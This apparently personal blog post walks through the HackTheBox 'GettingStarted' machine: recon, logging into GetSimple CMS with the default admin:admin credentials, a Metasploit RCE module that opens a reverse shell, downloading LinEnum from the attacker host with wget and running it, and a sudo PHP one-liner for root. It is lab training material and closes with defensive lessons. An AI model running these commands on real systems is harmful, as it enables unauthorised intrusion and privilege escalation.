david leonard

2026-05-13

HackTheBox — GettingStarted Writeup

A walkthrough of the GettingStarted machine — covering recon, exploiting a vulnerable CMS, and a sudo misconfiguration for root.

ctf, hackthebox

Overview

GettingStarted is a beginner-friendly Linux machine centered around a vulnerable GetSimple CMS installation. Initial access is achieved by exploiting an unauthenticated remote code execution vulnerability in GetSimple CMS 3.3.15 via Metasploit, landing a shell as www-data. Privilege escalation is straightforward — a sudo misconfiguration allows www-data to run the PHP binary as root without a password, which is trivially abused to spawn a root shell.

Reconnaissance

An initial service version scan revealed two open ports:

nmap -sV 10.129.85.202

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
80/tcp open  http    Apache httpd 2.4.41 (Ubuntu)

Port 80 is the primary attack surface. Navigating to it revealed a default GetSimple CMS installation — unstyled and unmodified, suggesting a poorly maintained deployment.

Directory fuzzing with ffuf was run against the web root:

ffuf -u http://10.129.85.202:80/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

Notable results included /admin, /backups, /data, /plugins, and /theme. The /admin redirect was the most interesting, indicating an admin login panel.

Initial Access

Default Credentials

The admin panel at /admin was tested with default credentials admin:admin, which were accepted — granting full administrative access to the CMS. Inside, a file upload interface was visible under the Files tab, and the settings page revealed the CMS version: GetSimple CMS 3.3.15, with an upgrade check failure confirming the installation was outdated and unpatched.

Exploitation

Searching Metasploit for GetSimple returned two relevant modules. The unauthenticated RCE module from 2019 was selected:

use exploit/multi/http/getsimplecms_unauth_code_exec
set RHOSTS 10.129.85.202
set LHOST <tun0 IP>
set LPORT 4444
exploit

The exploit succeeded and returned a shell as www-data. Enumerating /home revealed a user named mrb3n with the user flag sitting in their home directory.

Privilege Escalation

LinEnum was dropped into /tmp and executed to enumerate escalation vectors:

cd /tmp
wget http://<KALI_IP>:8080/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

The output immediately flagged a critical misconfiguration — www-data can run /usr/bin/php as any user with no password:

(ALL : ALL) NOPASSWD: /usr/bin/php

[+] Possible sudo pwnage!

Since the PHP interpreter can execute arbitrary system commands, this is effectively the same as unrestricted root access. A single one-liner was enough:

sudo php -r "system('/bin/bash');"

whoami
# root

The root flag was in /root/root.txt.

Key Takeaways

Default credentials are still one of the most impactful vulnerabilities out there. The admin panel was fully exposed with admin:admin — no brute forcing needed.

Unpatched CMS software is a real risk. GetSimple 3.3.15 had public exploits available since 2019. An upgrade check failure on the settings page was a dead giveaway.

Interpreter binaries should never get passwordless sudo. PHP, Python, Perl, Ruby — any of these can trivially spawn a shell. If you're doing a pentest or CTF and see one of these in sudo -l, it's game over. GTFOBins is a great reference for these escalation paths.

← back to blog